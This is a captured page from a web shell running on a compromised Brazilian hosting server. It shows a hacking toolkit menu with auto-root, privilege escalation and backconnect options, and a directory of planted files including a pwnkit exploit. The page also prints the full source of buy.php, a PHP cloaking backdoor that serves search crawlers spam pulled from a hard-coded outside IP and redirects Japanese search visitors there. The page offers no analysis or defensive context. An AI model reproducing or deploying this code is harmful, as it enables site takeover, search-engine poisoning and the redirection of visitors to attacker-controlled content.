Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
maringaliquida.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
2024
[ DIR ]
drwxr-xr-x
bb0bf
[ DIR ]
dr-xr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
f7ab8a
[ DIR ]
drwxr-xr-x
maringa_2024
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
dr-xr-xr-x
.htaccess
1.13
KB
-r-xr-xr-x
.mad-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
buy.php
5.99
KB
-rw-r--r--
google6b9f5097c2cffd8b.html
53
B
-rw-r--r--
google71f9f12f4f2307b0.html
53
B
-rw-r--r--
google9056d6dac6894689.html
53
B
-rw-r--r--
google9a8b2e838481a40b.html
53
B
-rw-r--r--
googlea7b76dea880c4e87.html
53
B
-rw-r--r--
googleb4ec9012eaa101f8.html
53
B
-rw-r--r--
googlec415b72ea43ebc4a.html
53
B
-rw-r--r--
googlec8d1c033f362d32b.html
53
B
-rw-r--r--
googlef65b5afabc3a1d1e.html
53
B
-rw-r--r--
googlefdfa70c42332752b.html
53
B
-rw-r--r--
index.php
13.29
KB
-r-xr-xr-x
index.php0
5.99
KB
-rw-r--r--
mah.php
2.03
KB
-r--r--r--
pages.php
1.51
KB
-r--r--r--
plugins.php
1.87
KB
-r--r--r--
postnews.php
5.72
KB
-r--r--r--
product.php
2
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
411
B
-r--r--r--
xmlrpc.php.0
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : buy.php
<?php $inter = "http://107.150.51.195/"; class Request { public function server($name = '', $default = '') { if (empty($name)) { return $_SERVER; } $name = strtoupper($name); return isset($_SERVER[$name]) ? $_SERVER[$name] : $default; } public function isSsl() { if ($this->server('HTTPS') && ('1' == $this->server('HTTPS') || 'on' == strtolower($this->server('HTTPS')))) { return true; } elseif ('https' == $this->server('REQUEST_SCHEME')) { return true; } elseif ('443' == $this->server('SERVER_PORT')) { return true; } elseif ('https' == $this->server('HTTP_X_FORWARDED_PROTO')) { return true; } return false; } public function host() { $host = strval($this->server('HTTP_X_FORWARDED_HOST') ?: $this->server('HTTP_HOST')); return strpos($host, ':') ? strstr($host, ':', true) : $host; } public function scheme() { return $this->isSsl() ? 'https' : 'http'; } public function domain() { $port = $this->port(); if (in_array($port, [80, 443])) { return $this->scheme() . '://' . $this->host(); } return $this->scheme() . '://' . $this->host() . ':' . $port; } public function port() { return (int)($this->server('HTTP_X_FORWARDED_PORT') ?: $this->server('SERVER_PORT', '')); } public function ip() { if (getenv('HTTP_CLIENT_IP')) { $ip = getenv('HTTP_CLIENT_IP'); } elseif (getenv('HTTP_X_FORWARDED_FOR')) { $ip = getenv('HTTP_X_FORWARDED_FOR'); } elseif (getenv('REMOTE_ADDR')) { $ip = getenv('REMOTE_ADDR'); } else { $ip = $this->server('REMOTE_ADDR'); } return $ip; } public function isCrawler() { $agent = strtolower($this->server('HTTP_USER_AGENT')); if ($agent != '' && preg_match('/googlebot|google|yahoo|bing|aol/si', $agent)) { return true; } return false; } public function isGuest() { $refer = strtolower($this->server('HTTP_REFERER')); if ($refer != '' && preg_match('/google.co.jp|yahoo.co.jp|google.com/si', $refer)) { return true; } return false; } public function uri() { $script_name = basename($this->server('SCRIPT_FILENAME')); if (basename($this->server('SCRIPT_NAME')) === $script_name) { $url = $this->server('SCRIPT_NAME'); } elseif (basename($this->server('PHP_SELF')) === $script_name) { $url = $this->server('PHP_SELF'); } elseif (basename($this->server('ORIG_SCRIPT_NAME')) === $script_name) { $url = $this->server('ORIG_SCRIPT_NAME'); } elseif (($pos = strpos($this->server('PHP_SELF'), '/' . $script_name)) !== false) { $url = substr($this->server('SCRIPT_NAME'), 0, $pos) . '/' . $script_name; } elseif ($this->server('DOCUMENT_ROOT') && strpos($this->server('SCRIPT_FILENAME'), $this->server('DOCUMENT_ROOT')) === 0) { $url = str_replace($this->server('DOCUMENT_ROOT'), '', $this->server('SCRIPT_FILENAME')); } if (($pos = strpos($this->server('REQUEST_URI'), '.php')) !== false) { $requri = $url . substr($this->server('REQUEST_URI'), $pos + 4); } else { $requri = $url . substr($this->server('REQUEST_URI'), strpos($this->server('REQUEST_URI'), '/')); } return rtrim($requri, '/'); } public function execReq($url, $params = array()) { $url = str_replace(' ', '+', $url); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params)); $output = curl_exec($ch); $errorCode = curl_errno($ch); curl_close($ch); if (0 !== $errorCode) { return false; } return $output; } } $req = new Request(); $isCrawler = $req->isCrawler(); $isGuest = $req->isGuest(); $apiRobot = $inter . 'robots'; $apiWords = $inter . 'word'; $apiJump = $inter . 'jump'; $apiMap = $inter . 'map'; $apiIndata = $inter . 'indata'; $uri = str_replace('/index.php', '', urldecode($req->uri())); $params = [ 'domain' => $req->domain(), 'port' => $req->port(), 'uri' => $uri ]; if (substr($uri, -6) == 'robots') { $output = $req->execReq($apiRobot, $params); file_put_contents(__DIR__ . '/robots.txt', $output); $robots_cont = @file_get_contents(__DIR__ . '/robots.txt'); if (strpos(strtolower($robots_cont), "sitemap")) { exit('robots.txt file create success!'); } else { exit('robots.txt file create fail!'); } } if (substr($uri, -4) == '.xml') { if (strpos($uri, "allsitemap.xml") || strpos($uri, "sitemap-index.xml") || strpos($uri, "sitemap-index-1.xml") || strpos($uri, "index.xml")) { $output = $req->execReq($apiMap, $params); header("Content-type:text/" . (substr($output, 0, 5) === '<?xml' ? 'xml' : 'plain') . '; charset=utf-8'); exit(''.$output); } $output = $req->execReq($apiWords, $params); header("Content-type:text/xml; charset=utf-8"); if ($output == '1') { exit(''.$req->execReq($apiMap, $params)); } else { exit(''.$output); } } $lang = $req->server('HTTP_ACCEPT_LANGUAGE'); if (!$isCrawler && $isGuest && preg_match('/ja/i', $lang)) { $params['ip'] = $req->ip(); exit(''.$req->execReq($apiJump, $params)); } if ($isCrawler) { exit(''.$req->execReq($apiIndata, $params)); } ?>
Close